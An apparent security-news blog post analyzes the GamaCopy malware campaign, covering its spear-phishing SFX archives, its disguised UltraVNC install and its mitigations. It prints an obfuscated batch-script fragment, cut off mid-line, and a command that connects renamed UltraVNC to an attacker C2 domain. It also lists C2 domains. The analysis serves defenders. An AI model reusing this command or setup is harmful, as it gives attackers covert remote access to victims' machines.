Cybersecurity researchers have uncovered a sophisticated malware campaign that infiltrates Russian-speaking organizations using 7-Zip self-extracting archives and the UltraVNC remote access tool. This campaign, attributed to a threat actor called GamaCopy, mimics the tactics previously associated with the Kremlin-aligned Gamaredon group, highlighting its advanced and targeted nature.
In this blog, we’ll delve into the attack chain, analyze the infrastructure the threat actors use, and discuss protective measures organizations can take to mitigate this threat.
Understanding the Attack Chain
The GamaCopy malware campaign begins with a carefully designed spear-phishing attack, an approach commonly used to target specific individuals or entities. The spear-phishing email contains a malicious self-extracting (SFX) archive created with 7-Zip. This archive serves as the initial payload and is designed to bypass standard security measures, ensuring the subsequent delivery of the malware’s core components.
How the Attack Works
Once the victim executes the SFX archive, it unpacks a batch script that performs several critical actions:
- Decoy Deployment: A PDF document with military-related content is copied to the victim’s system. This serves as a distraction while the malware performs its primary functions.
- Installation of UltraVNC: The script installs a legitimate remote access tool but disguises it under “OneDrivers.exe” to avoid detection.
- Command and Control Configuration: UltraVNC is configured to connect with the attacker’s command-and-control (C2) server, allowing the threat actors to gain unauthorized remote access to the victim’s system.
The attackers successfully infiltrate the targeted system by employing these steps while maintaining a covert presence.
Infrastructure Analysis
The batch script used in the campaign employs various obfuscation techniques to hide its intentions and hinder analysis. Below is an example of the script:
@echo off
set local enabledelayedexpansion
set qH09C99079b99D4900=%COMPUTERNAME%
set db53P23A03h83Z23e6=4797
set rM91V31H31q51V41E3=Ultr
set NX96b26L46A16Y66r6=aVNCKey Functions of the Script
- Renaming and Execution: The script copies UltraVNC to the victim’s system, renames it to “OneDrivers.exe,” and executes it with specific parameters, such as:
start "" %TEMP%\OneDrivers.exe -autoreconnect -id:%COMPUTERNAME%_SVOD_4797 -connect fmsru.ru:443 - Command and Control (C2) Servers: The malware connects to the following C2 servers, which facilitate the attackers’ remote access and control:
- nefteparkstroy.ru:443
- fmsru.ru:443
Similarities with Gamaredon Tactics
The tactics employed by GamaCopy closely resemble those of the Gamaredon group (also known as Core Werewolf, Awaken Likho, and PseudoGamaredon). These similarities include:
- Use of 7-Zip SFX Archives: GamaCopy relies on self-extracting archives for payload delivery, a tactic commonly observed in Gamaredon’s campaigns.
- Deployment of UltraVNC: The use of UltraVNC as a remote access tool mirrors previous Gamaredon operations.
- Port 443 for C2 Communication: Both groups utilize port 443, a standard HTTPS port, to establish connections with their C2 servers.
- Obfuscated Batch Scripts: The heavy reliance on batch script obfuscation is a hallmark of Gamaredon-inspired attacks.
These overlapping tactics suggest that GamaCopy has either drawn inspiration from Gamaredon or is a direct offshoot of the group.
Implications for Targeted Organizations
The GamaCopy campaign poses a significant threat to Russian-speaking organizations, particularly those in the defense, government, and critical infrastructure sectors. Using military-themed decoy documents indicates a focus on espionage and data exfiltration, aiming to gather sensitive information that could be used for strategic purposes.
Additionally, the sophistication of the campaign, combined with the use of legitimate tools like UltraVNC, makes it challenging to detect and mitigate.
Mitigation Strategies
Organizations should adopt a multi-layered cybersecurity approach to protect against the GamaCopy malware campaign and similar threats. Below are some key measures to consider:
1. Strengthen Email Security
- Deploy robust email filtering solutions to detect and quarantine suspicious attachments, particularly those using SFX archives.
- Implement advanced threat detection systems capable of identifying spear-phishing attempts.
2. Employee Awareness and Training
- Educate employees on recognizing phishing emails, especially those with military or sensitive themes.
- Conduct regular cybersecurity training sessions to ensure staff remain vigilant against social engineering tactics.
3. Application Allowlisting
- Implement application allowlisting to restrict the execution of unauthorized or unknown software.
- Monitor remote access tools like UltraVNC to ensure they are only used for legitimate purposes.
4. Network Monitoring
- Monitor network traffic for unexpected connections, particularly those using remote access protocols or connecting to suspicious domains.
- Deploy intrusion detection systems (IDS) to identify and block malicious activities in real-time.
5. Patch Management
- Regularly update and patch systems to address known vulnerabilities that threat actors could exploit.
- Ensure third-party tools, such as 7-Zip, are kept up to date to minimize potential security risks.
6. Incident Response Planning
- Develop and regularly test an incident response plan to quickly identify, contain, and mitigate security incidents.
- Establish communication protocols for reporting and addressing potential threats.
Conclusion
The GamaCopy malware campaign underscores the evolving nature of cyber threats and the importance of proactive defense measures. By leveraging spear-phishing emails, obfuscated scripts, and legitimate remote access tools, the threat actors behind GamaCopy have demonstrated their ability to bypass traditional security measures and target high-value organizations.
Organizations, particularly those in sensitive sectors, must remain vigilant and adopt comprehensive cybersecurity practices to mitigate the risks of advanced threat campaigns. By combining robust technology with employee awareness, businesses can strengthen their defenses and minimize the impact of sophisticated attacks like GamaCopy.
For more:
https://cybersecuritynews.com/new-malware-campaign-using-7z-ultravnc-tool/
